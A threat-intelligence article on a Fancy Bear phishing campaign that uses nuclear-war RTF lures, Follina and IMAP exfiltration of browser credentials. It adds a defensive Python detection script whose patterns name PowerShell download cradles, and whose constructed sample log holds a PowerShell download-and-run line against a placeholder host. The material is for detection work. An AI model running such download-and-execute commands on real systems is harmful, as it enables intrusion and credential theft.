APT group Fancy Bear, a Russian nation-state threat actor involved in several high-profile breaches, has been seen using nuclear war lures in its latest phishing campaign. The goal of the phishing emails is to compromise the targeted individual's system and steal credentials saved in web browsers such as Google Chrome or Mozilla Firefox.
The phishing emails carry an attached RTF document whose lure is built around the possibility of nuclear war arising from the Russian invasion of Ukraine. When the document is opened, the Follina vulnerability (CVE-2022-30190) is exploited to make the system download a DLL and an EXE file via PowerShell. The EXE file, which is placed in the user's home directory, is then executed. This executable collects all saved user information, such as usernames and passwords, from Google Chrome, Mozilla Firefox, and Microsoft Edge and packages it for exfiltration. Exfiltration is performed over an IMAP connection to a command-and-control server.
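As an added example (not code from the original report or from any vendor), the following Python triage script applies detection heuristics for the chain described above to a few constructed endpoint log lines. It assumes a JSON-lines telemetry format with the field names shown, that the Follina exploit surfaces as an Office process launching msdt.exe, that the download stage appears as PowerShell using a download cmdlet, and that IMAP exfiltration appears as a non-mail-client process connecting to TCP 143 or 993. The host name, user name, file names and URL in the sample log are made up.

```python
"""
Detection heuristics for the RTF -> Follina -> PowerShell download ->
home-directory EXE -> IMAP exfiltration chain. Added example, not code from
the report. The event format, field names and sample log lines are constructed.
Assumptions: CVE-2022-30190 is triggered through msdt.exe; IMAP uses TCP
143/993; user home directories live directly under C:\\Users\\.
"""
import json
import re
from typing import Dict, Iterable, List

# Office applications that have no business spawning a diagnostic tool or a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that match the Follina chain under an Office parent
# (msdt.exe for CVE-2022-30190; a shell for the download stage).
SUSPICIOUS_CHILDREN = {"msdt.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# PowerShell primitives commonly used to fetch a second stage.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer",
    re.IGNORECASE,
)
# An EXE sitting directly in a user's home directory (the report's placement),
# rather than in an install location such as Program Files.
HOME_EXE_PATTERN = re.compile(r"^c:\\users\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)
# Standard IMAP ports: 143 clear-text, 993 IMAPS.
IMAP_PORTS = {143, 993}
# Processes that legitimately speak IMAP; anything else doing so is worth a look.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_event(ev: Dict) -> List[str]:
    """Return detection names that fire on one process-creation event."""
    findings: List[str] = []
    parent = _base(ev.get("parent_image", ""))
    image = _base(ev.get("image", ""))
    cmdline = ev.get("command_line", "")
    if parent in OFFICE_PARENTS and image in SUSPICIOUS_CHILDREN:
        findings.append(f"office-spawned-{image}")
    if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_PATTERN.search(cmdline):
        findings.append("powershell-download-cradle")
    if HOME_EXE_PATTERN.match(ev.get("image", "").replace("/", "\\")):
        findings.append("exe-run-from-home-dir")
    return findings


def check_network_event(ev: Dict) -> List[str]:
    """Flag IMAP connections from anything that is not a known mail client."""
    image = _base(ev.get("image", ""))
    if ev.get("dest_port") in IMAP_PORTS and image not in MAIL_CLIENTS:
        return [f"imap-from-non-mail-client:{image}"]
    return []


def scan(lines: Iterable[str]) -> List[Dict]:
    """Run both checks over JSON-lines telemetry and collect the alerts."""
    alerts: List[Dict] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev.get("type") == "process":
            hits = check_process_event(ev)
        elif ev.get("type") == "network":
            hits = check_network_event(ev)
        else:
            hits = []
        if hits:
            alerts.append({"ts": ev.get("ts"), "host": ev.get("host"), "hits": hits})
    return alerts


# Constructed sample telemetry: four events from the described chain plus two
# benign events (Outlook talking IMAP, Explorer launching Notepad).
SAMPLE_LOG = r"""
{"ts":"2022-09-20T08:01:10Z","host":"WS01","type":"process","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\msdt.exe","command_line":"msdt.exe"}
{"ts":"2022-09-20T08:01:11Z","host":"WS01","type":"process","parent_image":"C:\\Windows\\System32\\msdt.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -NoProfile -Command Invoke-WebRequest https://example.invalid/stage -OutFile C:\\Users\\alice\\updater.exe"}
{"ts":"2022-09-20T08:01:14Z","host":"WS01","type":"process","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","image":"C:\\Users\\alice\\updater.exe","command_line":"updater.exe"}
{"ts":"2022-09-20T08:01:20Z","host":"WS01","type":"network","image":"C:\\Users\\alice\\updater.exe","dest_ip":"203.0.113.10","dest_port":993}
{"ts":"2022-09-20T08:02:00Z","host":"WS01","type":"network","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","dest_ip":"203.0.113.20","dest_port":993}
{"ts":"2022-09-20T08:02:05Z","host":"WS01","type":"process","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","command_line":"notepad.exe"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(alert)
```

Each alert names the stage it matched, so an analyst can see the chain assemble in order: Word spawning msdt.exe, a PowerShell download cradle, an EXE running from the home directory, and finally that EXE opening IMAPS. Correlating all four on one host within a short window is a much stronger signal than any single rule, which on its own (especially the PowerShell download check) will fire on legitimate administration.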
Given the targets of these phishing emails and the involvement of this Russia-based threat actor, the campaign is believed to be part of the conflict in Ukraine.